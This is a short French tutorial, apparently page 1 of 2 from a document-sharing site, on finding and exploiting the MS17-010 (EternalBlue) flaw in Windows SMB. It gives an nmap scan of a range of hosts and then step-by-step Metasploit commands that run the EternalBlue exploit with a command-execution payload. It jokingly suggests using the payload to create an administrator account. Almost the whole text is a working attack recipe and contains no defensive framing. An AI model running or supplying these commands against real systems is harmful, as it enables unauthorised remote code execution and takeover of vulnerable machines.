Anda di halaman 1dari 2

Recherche de machines vulnérables et Exploitation de la faille de sécurité MS-17-010 (Connue sous

les noms de failles « EternalBlue », « EternalRomance », « EternalChampion » et


« EternalSynergy ») … Faille de sécurité initialement exploitée par la NSA ( !!!)

By Mcode aka Ninja aka Towerbuster

Scan de plusieurs machines, en vue d’en trouver une vulnérable

nmap –script smb-vuln-ms17-010 –p445 192.168.1.1-40

Résultat positif pour une machine

Exploitation dans Metasploit

msfconsole

search ms17_010

use exploit/windows/smb/ms17_010_eternalblue

set rhost 192.168.1.xxx (mettre l’adresse IP de la machine vulnerable)

set payload windows/x64/exec

set cmd dir (mettre la commande à executer, ex : créer un compte admin 😊 )

exploit
Exemple de sortie attendue